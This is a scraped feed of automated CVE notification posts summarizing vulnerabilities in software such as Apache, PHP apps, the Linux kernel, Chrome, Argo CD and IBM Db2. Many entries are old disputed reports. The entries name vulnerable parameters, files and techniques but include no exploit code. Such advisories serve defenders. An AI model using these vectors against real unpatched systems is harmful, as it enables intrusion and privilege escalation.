🚨 CVE-2003-5001A vulnerability was found in ISS BlackICE PC Protection and classified as critical. Affected by this issue is the component Cross Site Scripting Detection. The manipulation as part of POST/PUT/DELETE/OPTIONS Request leads to privilege escalation. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-08 03:37:24 |
🚨 CVE-2003-1307The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP.🎖@cveNotify |
|
| 2024-08-08 02:37:32 |
🚨 CVE-2004-2657Mozilla Firefox 1.5.0.1, and possibly other versions, preserves some records of user activity even after uninstalling, which allows local users who share a Windows profile to view the records after a new installation of Firefox, as reported for the list of Passwords Never Saved web sites. NOTE: The vendor has disputed this issue, stating that "The uninstaller is primarily there to uninstall the application. It is not there to uninstall user data. For the moment I will stick by my module-owner decision.🎖@cveNotify |
|
| 2024-08-08 02:37:26 |
🚨 CVE-2004-2343Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument🎖@cveNotify |
|
| 2024-08-08 02:37:25 |
🚨 CVE-2004-2238Format string vulnerability in vsybase.c in vpopmail 5.4.2 and earlier has unknown impact and attack vectors. NOTE: in a followup post, it was observed that the source code used constants that, when compiled, became static format strings. Thus this is not a vulnerability🎖@cveNotify |
|
| 2024-08-08 02:37:24 |
🚨 CVE-2003-0249PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report.🎖@cveNotify |
|
| 2024-08-08 01:37:24 |
🚨 CVE-2004-1621NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in IBM Lotus Notes R6 and Domino R6, and possibly earlier versions, allows remote attackers to execute arbitrary web script or HTML via square brackets at the beginning and end of (1) computed for display, (2) computed when composed, or (3) computed text element fields. NOTE: the vendor has disputed this issue, saying that it is not a problem with Notes/Domino itself, but with the applications that do not properly handle this feature🎖@cveNotify |
|
| 2024-08-08 01:07:25 |
🚨 CVE-2024-36971In the Linux kernel, the following vulnerability has been resolved:net: fix __dst_negative_advice() race__dst_negative_advice() does not enforce proper RCU rules whensk->dst_cache must be cleared, leading to possible UAF.RCU rules are that we must first clear sk->sk_dst_cache,then call dst_release(old_dst).Note that sk_dst_reset(sk) is implementing this protocol correctly,while __dst_negative_advice() uses the wrong order.Given that ip6_negative_advice() has special logicagainst RTF_CACHE, this means each of the three ->negative_advice()existing methods must perform the sk_dst_reset() themselves.Note the check against NULL dst is centralized in__dst_negative_advice(), there is no need to duplicateit in various callbacks.Many thanks to Clement Lecigne for tracking this issue.This old bug became visible after the blamed commit, using UDP sockets.🎖@cveNotify |
|
| 2024-08-08 01:07:24 |
🚨 CVE-2024-32113Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.Users are recommended to upgrade to version 18.12.13, which fixes the issue.🎖@cveNotify |
|
| 2024-08-08 00:37:54 |
🚨 CVE-2005-4161Multiple cross-site scripting (XSS) vulnerabilities in MilliScripts 1.4 redirect script allow remote attackers to inject arbitrary web script or HTML via the domainname parameter to register.php, and other unspecified vectors. NOTE: the vendor has disputed this issue, stating "No invalid input can reach the script.🎖@cveNotify |
|
| 2024-08-08 00:37:47 |
🚨 CVE-2005-4159NOTE: this issue has been disputed by the vendor and third parties. SQL injection vulnerability in Memberlist.php in Simple Machines Forum (SMF) 1.1 rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the start parameter. NOTE: the vendor says that since only one character can be modified, there is no SQL injection. Thus this might be an "invalid SQL syntax error." Multiple followups support the vendor🎖@cveNotify |
|
| 2024-08-08 00:37:46 |
🚨 CVE-2005-3497SQL injection vulnerability in process_signup.php in PHP Handicapper allows remote attackers to execute arbitrary SQL commands via the serviceid parameter. NOTE: on 20060210, the vendor disputed this issue, saying "this is 100% false reporting, this is a slander campaign from a customer who had a vulnerability in his SERVER not the software." However, followup investigation strongly suggests that the original report is correct🎖@cveNotify |
|
| 2024-08-08 00:37:45 |
🚨 CVE-2004-0091NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in register.php for unknown versions of vBulletin allows remote attackers to inject arbitrary HTML or web script via the reg_site (or possibly regsite) parameter. NOTE: the vendor has disputed this issue, saying "There is no hidden field called 'reg_site', nor any $reg_site variable anywhere in the vBulletin 2 or vBulletin 3 source code or templates, nor has it ever existed. We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft.🎖@cveNotify |
|
| 2024-08-07 23:37:32 |
🚨 CVE-2024-38166An unauthenticated attacker can exploit improper neutralization of input during web page generation in Microsoft Dynamics 365 to spoof over a network by tricking a user to click on a link.🎖@cveNotify |
|
| 2024-08-07 23:37:26 |
🚨 CVE-2005-2898NOTE: this issue has been disputed by the vendor. FileZilla 2.2.14b and 2.2.15, and possibly earlier versions, when "Use secure mode" is disabled, uses a weak encryption scheme to store the user's password in the configuration settings file, which allows local users to obtain sensitive information. NOTE: the vendor has disputed the issue, stating that "the problem is not a vulnerability at all, but in fact a fundamental issue of every single program that can store passwords transparently.🎖@cveNotify |
|
| 2024-08-07 23:37:25 |
🚨 CVE-2005-2221Multiple SQL injection vulnerabilities in Dragonfly Commerce allows remote attackers to modify SQL statements and possibly execute arbitrary SQL commands via the (1) key parameter to dc_Categoriesview.asp, (2) dc_productslist_Clearance.asp, (3) PID parameter to ratings.asp, (4) dc_Productsview.asp, (5) start, (6) key_mp, (7) searchtype, or (8) psearch parameters to dc_forum_Postslist.asp. NOTE: the vendor has disputed this issue, saying that the error messages arise from invalid category and product numbers. Assuming that this is the case, the issue still satisfies the CVE definition of "exposure.🎖@cveNotify |
|
| 2024-08-07 23:37:24 |
🚨 CVE-2005-2220Dragonfly Commerce allows remote attackers to change a product price by modifying the x_DragonflyCartProductPrice hidden field to (1) dc_Categorieslist.asp, (2) dc_Categoriesview.asp, (3) dc_productslist.asp, and (4) dc_productslist_Clearance.asp. NOTE: the vendor has disputed this issue, saying that "Dragonfly Commerce does not allow for editing prices nor does it allow for viewing information about clients stored in the database except by the store owner and authorized staff as appointed in the store administration." However, SecurityTracker claims that they have been able to confirm the problem🎖@cveNotify |
|
| 2024-08-07 22:37:32 |
🚨 CVE-2005-1588SQL injection vulnerability in index.php for Quick.cart 0.3.0 allows remote attackers to execute arbitrary SQL commands via the iCategory parameter. NOTE: the vendor has privately disputed this issue, saying that Quick.cart does not even use SQL and therefore can not be vulnerable to SQL injection🎖@cveNotify |
|
| 2024-08-07 22:37:25 |
🚨 CVE-2005-1146NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in the login command in calendar.pl in CalendarScript 3.21 allows remote attackers to inject arbitrary web script or HTML via the username parameter, a different vulnerability than CVE-2005-1145🎖@cveNotify |
|
| 2024-08-07 22:37:24 |
🚨 CVE-2005-1145NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in calendar.pl in CalendarScript 3.20 allows remote attackers to inject arbitrary web script or HTML via the template parameter, a different vulnerability than CVE-2005-1146🎖@cveNotify |
|
| 2024-08-07 22:07:24 |
🚨 CVE-2024-6996Race in Frames in Google Chrome prior to 127.0.6533.72 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-08-07 21:37:32 |
🚨 CVE-2006-6285PHP remote file inclusion vulnerability in index.php in Kai Blankenhorn Bitfolge simple and nice index file (aka snif) 1.5.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the externalConfig parameter. NOTE: CVE and other third parties dispute this vulnerability because $externalConfig is defined before use🎖@cveNotify |
|
| 2024-08-07 21:37:25 |
🚨 CVE-2006-6165ld.so in FreeBSD, NetBSD, and possibly other BSD distributions does not remove certain harmful environment variables, which allows local users to gain privileges by passing certain environment variables to loading processes. NOTE: this issue has been disputed by a third party, stating that it is the responsibility of the application to properly sanitize the environment🎖@cveNotify |
|
| 2024-08-07 21:37:24 |
🚨 CVE-2005-0296NOTE: this issue has been disputed by the vendor. The error module in Novell GroupWise WebAccess allows remote attackers who have not authenticated to read potentially sensitive information, such as the version, via an incorrect login and a modified (1) error or (2) modify parameter that returns template files or the "about" information page. NOTE: the vendor has disputed this issue🎖@cveNotify |
|
| 2024-08-07 21:07:32 |
🚨 CVE-2024-39225GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a remote code execution (RCE) vulnerability.🎖@cveNotify |
|
| 2024-08-07 21:07:25 |
🚨 CVE-2024-41825In JetBrains TeamCity before 2024.07 stored XSS was possible on the Code Inspection tab🎖@cveNotify |
|
| 2024-08-07 21:07:24 |
🚨 CVE-2024-41824In JetBrains TeamCity before 2024.07 parameters of the "password" type could leak into the build log in some specific cases🎖@cveNotify |
|
| 2024-08-07 20:37:32 |
🚨 CVE-2006-4557PHP remote file inclusion vulnerability in plugins/plugins.php in Bob Jewell Discloser 0.0.4 allows remote attackers to execute arbitrary PHP code via a URL in the type parameter. NOTE: another researcher has stated that an attacker cannot control the type parameter. As of 20060901, CVE analysis concurs with the dispute🎖@cveNotify |
|
| 2024-08-07 20:37:26 |
🚨 CVE-2006-4556PHP remote file inclusion vulnerability in index.php in the JIM component for Mambo and Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. NOTE: another researcher has stated that the product distribution does not include an index.php file. Also, this might be related to CVE-2006-4242🎖@cveNotify |
|
| 2024-08-07 20:37:25 |
🚨 CVE-2006-4455Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service (crash) via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"🎖@cveNotify |
|
| 2024-08-07 20:37:24 |
🚨 CVE-2006-4445Multiple PHP remote file inclusion vulnerabilities in CuteNews 1.3.x allow remote attackers to execute arbitrary PHP code via a URL in the cutepath parameter to (1) show_news.php or (2) search.php. NOTE: CVE analysis as of 20060829 has not identified any scenarios in which these vectors could result in remote file inclusion🎖@cveNotify |
|
| 2024-08-07 20:07:37 |
🚨 CVE-2024-7564Logsign Unified SecOps Platform Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Logsign Unified SecOps Platform. Authentication is required to exploit this vulnerability.The specific flaw exists within the get_response_json_result endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-24680.🎖@cveNotify |
|
| 2024-08-07 20:07:31 |
🚨 CVE-2024-7005Insufficient validation of untrusted input in Safe Browsing in Google Chrome prior to 127.0.6533.72 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass discretionary access control via a malicious file. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-08-07 20:07:30 |
🚨 CVE-2024-6997Use after free in Tabs in Google Chrome prior to 127.0.6533.72 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-08-07 20:07:29 |
🚨 CVE-2024-6995Inappropriate implementation in Fullscreen in Google Chrome on Android prior to 127.0.6533.72 allowed a remote attacker who convinced a user to engage in specific UI gestures to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-08-07 20:07:26 |
🚨 CVE-2022-48791In the Linux kernel, the following vulnerability has been resolved:scsi: pm8001: Fix use-after-free for aborted TMF sas_taskCurrently a use-after-free may occur if a TMF sas_task is aborted before wehandle the IO completion in mpi_ssp_completion(). The abort occurs due totimeout.When the timeout occurs, the SAS_TASK_STATE_ABORTED flag is set and thesas_task is freed in pm8001_exec_internal_tmf_task().However, if the I/O completion occurs later, the I/O completion stillthinks that the sas_task is available. Fix this by clearing the ccb->taskif the TMF times out - the I/O completion handler does nothing if thispointer is cleared.🎖@cveNotify |
|
| 2024-08-07 20:07:25 |
🚨 CVE-2022-48788In the Linux kernel, the following vulnerability has been resolved:nvme-rdma: fix possible use-after-free in transport error_recovery workWhile nvme_rdma_submit_async_event_work is checking the ctrl and queuestate before preparing the AER command and scheduling io_work, in orderto fully prevent a race where this check is not reliable the errorrecovery work must flush async_event_work before continuing to destroythe admin queue after setting the ctrl state to RESETTING such thatthere is no race .submit_async_event and the error recovery handleritself changing the ctrl state.🎖@cveNotify |
|
| 2024-08-07 20:07:24 |
🚨 CVE-2022-48787In the Linux kernel, the following vulnerability has been resolved:iwlwifi: fix use-after-freeIf no firmware was present at all (or, presumably, all of thefirmware files failed to parse), we end up unbinding by callingdevice_release_driver(), which calls remove(), which then iniwlwifi calls iwl_drv_stop(), freeing the 'drv' struct. Howeverthe new code I added will still erroneously access it after itwas freed.Set 'failure=false' in this case to avoid the access, all datawas already freed anyway.🎖@cveNotify |
|
| 2024-08-07 19:37:44 |
🚨 CVE-2006-3692PHP remote file inclusion vulnerability in enduser/listmessenger.php in ListMessenger 0.9.3 allows remote attackers to execute arbitrary PHP code via a URL in the lm_path parameter. NOTE: the vendor has disputed this issue to SecurityTracker, stating that the $lm_path variable is set to a constant value. As of 20060726, CVE concurs with the vendor based on SecurityTracker's post-disclosure analysis🎖@cveNotify |
|
| 2024-08-07 19:37:43 |
🚨 CVE-2006-3662SQL injection vulnerability in index.php in ATutor 1.5.3 allows remote attackers to execute arbitrary SQL commands via the fid parameter. NOTE: this issue has been disputed by the vendor, who states "The mentioned SQL injection vulnerability is not possible." However, the relevant source code suggests that this issue may be legitimate, and the parameter is cleansed in 1.5.3.1🎖@cveNotify |
|
| 2024-08-07 19:37:42 |
🚨 CVE-2006-3547EMC VMware Player allows user-assisted attackers to cause a denial of service (unrecoverable application failure) via a long value of the ide1:0.fileName parameter in the .vmx file of a virtual machine. NOTE: third parties have disputed this issue, saying that write access to the .vmx file enables other ways of stopping the virtual machine, so no privilege boundaries are crossed🎖@cveNotify |
|
| 2024-08-07 19:37:39 |
🚨 CVE-2006-3545Microsoft Internet Explorer 7.0 Beta allows remote attackers to cause a denial of service (application crash) via a web page with multiple empty APPLET start tags. NOTE: a third party has disputed this issue, stating that the crash does not occur with Microsoft Internet Explorer 7.0 Beta3🎖@cveNotify |
|
| 2024-08-07 19:37:38 |
🚨 CVE-2006-3543Multiple SQL injection vulnerabilities in Invision Power Board (IPB) 1.x and 2.x allow remote attackers to execute arbitrary SQL commands via the (1) idcat and (2) code parameters in a ketqua action in index.php; the id parameter in a (3) Attach and (4) ref action in index.php; the CODE parameter in a (5) Profile, (6) Login, and (7) Help action in index.php; and the (8) member_id parameter in coins_list.php. NOTE: the developer has disputed this issue, stating that the "CODE attribute is never present in an SQL query" and the "'ketqua' [action] and file 'coin_list.php' are not standard IPB 2.x features". It is unknown whether these vectors are associated with an independent module or modification of IPB🎖@cveNotify |
|
| 2024-08-07 19:37:37 |
🚨 CVE-2006-3486Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability🎖@cveNotify |
|
| 2024-08-07 19:07:33 |
🚨 CVE-2023-51496Missing Authorization vulnerability in Woo WooCommerce Warranty Requests.This issue affects WooCommerce Warranty Requests: from n/a through 2.2.7.🎖@cveNotify |
|
| 2024-08-07 19:07:26 |
🚨 CVE-2023-51495Missing Authorization vulnerability in Woo WooCommerce Warranty Requests.This issue affects WooCommerce Warranty Requests: from n/a through 2.2.7.🎖@cveNotify |
|
| 2024-08-07 19:07:25 |
🚨 CVE-2023-51507Missing Authorization vulnerability in ExpressTech Quiz And Survey Master.This issue affects Quiz And Survey Master: from n/a through 8.1.16.🎖@cveNotify |
|
| 2024-08-07 19:07:24 |
🚨 CVE-2023-37394Missing Authorization vulnerability in Deepak anand WP Dummy Content Generator.This issue affects WP Dummy Content Generator: from n/a through 2.3.0.🎖@cveNotify |
|
| 2024-08-07 18:37:32 |
🚨 CVE-2006-2827SQL injection vulnerability in search.php in X-Cart Gold and Pro 4.0.18, and X-Cart 4.1.0 beta 1, allows remote attackers to execute arbitrary SQL commands via the "Search for pattern" field, when the settings specify only "Search in Detailed description" and "Search also in ISBN." NOTE: the vendor disputed this issue in a comment on the original researcher's blog, saying "the bug does not impose any security threat and remote attackers can't add, modify, or delete information in the back-end database by sending specially-crafted SQL statements to the search.php script using various search parameters." As of 20060605, the original blog entry is unavailable, although ISS also reports the same dispute. CVE has not been able to investigate this issue further, although the researcher sometimes makes inaccurate claims🎖@cveNotify |
|
| 2024-08-07 18:37:26 |
🚨 CVE-2006-2473Cross-site scripting (XSS) vulnerability in ow.asp in OpenWiki 0.78 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this issue has been disputed by the vendor and a third party who is affiliated with the product. The vendor states "You cannot insert code in a wikipage or via URL parameters as they are all escaped before usage, so nothing can be compromised at other sites.🎖@cveNotify |
|
| 2024-08-07 18:37:25 |
🚨 CVE-2006-1854Multiple cross-site scripting (XSS) vulnerabilities in BluePay Manager 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML during a login action via the (1) Account Name and (2) Username field. NOTE: the vendor has disputed this vulnerability, saying that "it does not exist currently in the Bluepay 2.0 product," and older versions might not have been affected either. As of 20060512, CVE has not formally investigated this dispute🎖@cveNotify |
|
| 2024-08-07 18:37:24 |
🚨 CVE-2006-1651Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol.🎖@cveNotify |
|
| 2024-08-07 18:07:25 |
🚨 CVE-2023-40603Missing Authorization vulnerability in Gangesh Matta Simple Org Chart.This issue affects Simple Org Chart: from n/a through 2.3.4.🎖@cveNotify |
|
| 2024-08-07 18:07:24 |
🚨 CVE-2023-40209Missing Authorization vulnerability in Himalaya Saxena Highcompress Image Compressor.This issue affects Highcompress Image Compressor: from n/a through 6.0.0.🎖@cveNotify |
|
| 2024-08-07 17:37:42 |
🚨 CVE-2023-24816IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Versions prior to 8.1.0 are subject to a command injection vulnerability with very specific prerequisites. This vulnerability requires that the function `IPython.utils.terminal.set_term_title` be called on Windows in a Python environment where ctypes is not available. The dependency on `ctypes` in `IPython.utils._process_win32` prevents the vulnerable code from ever being reached in the ipython binary. However, as a library that could be used by another tool `set_term_title` could be called and hence introduce a vulnerability. Should an attacker get untrusted input to an instance of this function they would be able to inject shell commands as current process and limited to the scope of the current process. Users of ipython as a library are advised to upgrade. Users unable to upgrade should ensure that any calls to the `IPython.utils.terminal.set_term_title` function are done with trusted or filtered input.🎖@cveNotify |
|
| 2024-08-07 17:37:41 |
🚨 CVE-2007-6752Cross-site request forgery (CSRF) vulnerability in Drupal 7.12 and earlier allows remote attackers to hijack the authentication of arbitrary users for requests that end a session via the user/logout URI. NOTE: the vendor disputes the significance of this issue, by considering the "security benefit against platform complexity and performance impact" and concluding that a change to the logout behavior is not planned because "for most sites it is not worth the trade-off.🎖@cveNotify |
|
| 2024-08-07 17:37:38 |
🚨 CVE-2006-1273Mozilla Firefox 1.0.7 and 1.5.0.1 allows remote attackers to cause a denial of service (crash) via an HTML tag with a large number of script action handlers such as onload and onmouseover, which triggers the crash when the user views the page source. NOTE: Red Hat has disputed this issue, suggesting that "It is likely the reporter was running the IE Tab extension," and Mozilla also confirmed that this is not an issue in Firefox itself🎖@cveNotify |
|
| 2024-08-07 17:37:37 |
🚨 CVE-2006-1096Cross-site scripting (XSS) vulnerability in index.php in NZ Ecommerce allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the vendor has disputed this issue in a comment on the researcher's blog, but research by CVE suggests that this might be a legitimate problem🎖@cveNotify |
|
| 2024-08-07 17:37:36 |
🚨 CVE-2006-0897SQL injection vulnerability in VCS Virtual Program Management Intranet (VPMi) Enterprise 3.3 allows remote attackers to execute arbitrary SQL commands via the UpdateID0 parameter to Service_Requests.asp. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. NOTE: the vendor has disputed this issue, saying that "[we] have a behind the scenes complex state management system that uses a combination of keys placed in JavaScript and Session State (server side) that protects against the type of SQL injection you describe. We have tested for many of the cases and have not found it to be an issue." Further investigation suggests that the original researcher might have triggered errors using invalid field values, which is not proof of SQL injection; however, the vendor did not receive a response from the original researcher🎖@cveNotify |
|
| 2024-08-07 17:37:32 |
🚨 CVE-2006-0755Multiple PHP remote file include vulnerabilities in dotProject 2.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary commands via the baseDir parameter in (1) db_adodb.php, (2) db_connect.php, (3) session.php, (4) vw_usr_roles.php, (5) calendar.php, (6) date_format.php, and (7) tasks/gantt.php; and the dPconfig[root_dir] parameter in (8) projects/gantt.php, (9) gantt2.php, and (10) vw_files.php. NOTE: the vendor disputes this issue, stating that the product documentation clearly recommends that the system administrator disable register_globals, and that the check.php script warns against this setting. Also, the vendor says that the protection.php/siteurl vector is incorrect because protection.php does not exist in the product🎖@cveNotify |
|
| 2024-08-07 17:37:31 |
🚨 CVE-2006-0733Cross-site scripting (XSS) vulnerability in WordPress 2.0.0 allows remote attackers to inject arbitrary web script or HTML via scriptable attributes such as (1) onfocus and (2) onblur in the "author's website" field. NOTE: followup comments to the researcher's web log suggest that this issue is only exploitable by the same user who injects the XSS, so this might not be a vulnerability🎖@cveNotify |
|
| 2024-08-07 17:37:30 |
🚨 CVE-2006-0669Multiple SQL injection vulnerabilities in archive.asp in GA's Forum Light allow remote attackers to execute arbitrary SQL commands via the (1) Forum and (2) pages parameter. NOTE: SecurityTracker says that the vendor has disputed this issue, saying that GA Forum Light does not use an SQL database. SecurityTracker's research indicates that the original problem could be due to a vbscript parsing error based on invalid arguments🎖@cveNotify |
|
| 2024-08-07 17:37:26 |
🚨 CVE-2006-0369MySQL 5.0.18 allows local users with access to a VIEW to obtain sensitive information via the "SELECT * FROM information_schema.views;" query, which returns the query that created the VIEW. NOTE: this issue has been disputed by third parties, saying that the availability of the schema is a normal and sometimes desired aspect of database access🎖@cveNotify |
|
| 2024-08-07 17:37:25 |
🚨 CVE-2006-0244Directory traversal vulnerability in workspaces.php in phpXplorer 0.9.33 allows remote attackers to include arbitrary files via a .. (dot dot) and trailing null byte (%00) in the sShare parameter. NOTE: a followup post claims that this is not a vulnerability since the functionality of phpXplorer supports the upload of PHP files, which would not cross privilege boundaries since the PHP functionality would support read access outside the web root🎖@cveNotify |
|
| 2024-08-07 17:37:24 |
🚨 CVE-2006-0070Drupal allows remote attackers to conduct cross-site scripting (XSS) attacks via an IMG tag with an unusual encoded Javascript function name, as demonstrated using variations of the alert() function. NOTE: a followup by the vendor suggests that the issue does not exist in 4.5.6 or 4.6.4 when "Filtered HTML" is enabled, and since "Full HTML" would not filter HTML by design, perhaps this should not be included in CVE🎖@cveNotify |
|
| 2024-08-07 17:07:36 |
🚨 CVE-2024-37346There is an insufficient input validation vulnerability inthe Warehouse component of Absolute Secure Access prior to 13.06. Attackerswith system administrator permissions can impair the availability of certainelements of the Secure Access administrative UI by writing invalid data to thewarehouse over the network. There is no loss of warehouse integrity orconfidentiality, the security scope is unchanged. Loss of availability is high.🎖@cveNotify |
|
| 2024-08-07 17:07:35 |
🚨 CVE-2024-38083Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-08-07 17:07:31 |
🚨 CVE-2024-37635TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid in the function setWiFiBasicCfg🎖@cveNotify |
|
| 2024-08-07 17:07:30 |
🚨 CVE-2024-25052IBM Jazz Reporting Service 7.0.3 stores user credentials in plain clear text which can be read by an admin user. IBM X-Force ID: 283363.🎖@cveNotify |
|
| 2024-08-07 17:07:29 |
🚨 CVE-2024-31881IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash when using a specially crafted query on certain columnar tables by an authenticated user. IBM X-Force ID: 287613.🎖@cveNotify |
|
| 2024-08-07 17:07:26 |
🚨 CVE-2023-29267IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user. IBM X-Force ID: 287612.🎖@cveNotify |
|
| 2024-08-07 17:07:25 |
🚨 CVE-2024-5908A problem with the Palo Alto Networks GlobalProtect app can result in exposure of encrypted user credentials, used for connecting to GlobalProtect, in application logs. Normally, these application logs are only viewable by local users and are included when generating logs for troubleshooting purposes. This means that these encrypted credentials are exposed to recipients of the application logs.🎖@cveNotify |
|
| 2024-08-07 17:07:24 |
🚨 CVE-2024-5907A privilege escalation (PE) vulnerability in the Palo Alto Networks Cortex XDR agent on Windows devices enables a local user to execute programs with elevated privileges. However, execution does require the local user to successfully exploit a race condition, which makes this vulnerability difficult to exploit.🎖@cveNotify |
|
| 2024-08-07 16:37:44 |
🚨 CVE-2007-6059Javamail does not properly handle a series of invalid login attempts in which the same e-mail address is entered as username and password, and the domain portion of this address yields a Java UnknownHostException error, which allows remote attackers to cause a denial of service (connection pool exhaustion) via a large number of requests, resulting in a SQLNestedException. NOTE: Sun disputes this issue, stating "The report makes references to source code and files that do not exist in the mentioned products.🎖@cveNotify |
|
| 2024-08-07 16:37:43 |
🚨 CVE-2007-5811Directory traversal vulnerability in PageTraiteDownload.php in phpMyConferences 8.0.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter. NOTE: this issue is disputed for 8.0.2 by a reliable third party, who notes that the PHP code is syntactically incorrect and cannot be executed🎖@cveNotify |
|
| 2024-08-07 16:37:42 |
🚨 CVE-2007-5566Multiple PHP remote file inclusion vulnerabilities in PHPBlog 0.1 Alpha allow remote attackers to execute arbitrary PHP code via a URL in the blog_localpath parameter to (1) includes/functions.php or (2) includes/email.php. NOTE: this issue is disputed by CVE because the identified code is in functions that are not accessible via direct request🎖@cveNotify |
|
| 2024-08-07 16:37:38 |
🚨 CVE-2007-5469OpenSER 1.2.2 does not verify the Digest authentication header URI against the Request URI in SIP messages, which allows remote attackers to use sniffed Digest authentication credentials to call arbitrary telephone numbers or spoof caller ID (aka "toll fraud and authentication forward attack"). NOTE: Debian disputes this issue, stating that "having the two URIs mismatch is allowed by the standard and happens in some setups for valid reasons.🎖@cveNotify |
|
| 2024-08-07 16:07:44 |
🚨 CVE-2022-31034Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v0.11.0 are vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or UI. The vulnerabilities are due to the use of insufficiently random values in parameters in Oauth2/OIDC login flows. In each case, using a relatively-predictable (time-based) seed in a non-cryptographically-secure pseudo-random number generator made the parameter less random than required by the relevant spec or by general best practices. In some cases, using too short a value made the entropy even less sufficient. The attacks on login flows which are meant to be mitigated by these parameters are difficult to accomplish but can have a high impact potentially granting an attacker admin access to Argo CD. Patches for this vulnerability has been released in the following Argo CD versions: v2.4.1, v2.3.5, v2.2.10 and v2.1.16. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-08-07 16:07:43 |
🚨 CVE-2022-29165Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. A critical vulnerability has been discovered in Argo CD starting with version 1.4.0 and prior to versions 2.1.15, 2.2.9, and 2.3.4 which would allow unauthenticated users to impersonate as any Argo CD user or role, including the `admin` user, by sending a specifically crafted JSON Web Token (JWT) along with the request. In order for this vulnerability to be exploited, anonymous access to the Argo CD instance must have been enabled. In a default Argo CD installation, anonymous access is disabled. The vulnerability can be exploited to impersonate as any user or role, including the built-in `admin` account regardless of whether it is enabled or disabled. Also, the attacker does not need an account on the Argo CD instance in order to exploit this. If anonymous access to the instance is enabled, an attacker can escalate their privileges, effectively allowing them to gain the same privileges on the cluster as the Argo CD instance, which is cluster admin in a default installation. This will allow the attacker to create, manipulate and delete any resource on the cluster. They may also exfiltrate data by deploying malicious workloads with elevated privileges, thus bypassing any redaction of sensitive data otherwise enforced by the Argo CD API. A patch for this vulnerability has been released in Argo CD versions 2.3.4, 2.2.9, and 2.1.15. As a workaround, one may disable anonymous access, but upgrading to a patched version is preferable.🎖@cveNotify |
|
| 2024-08-07 16:07:42 |
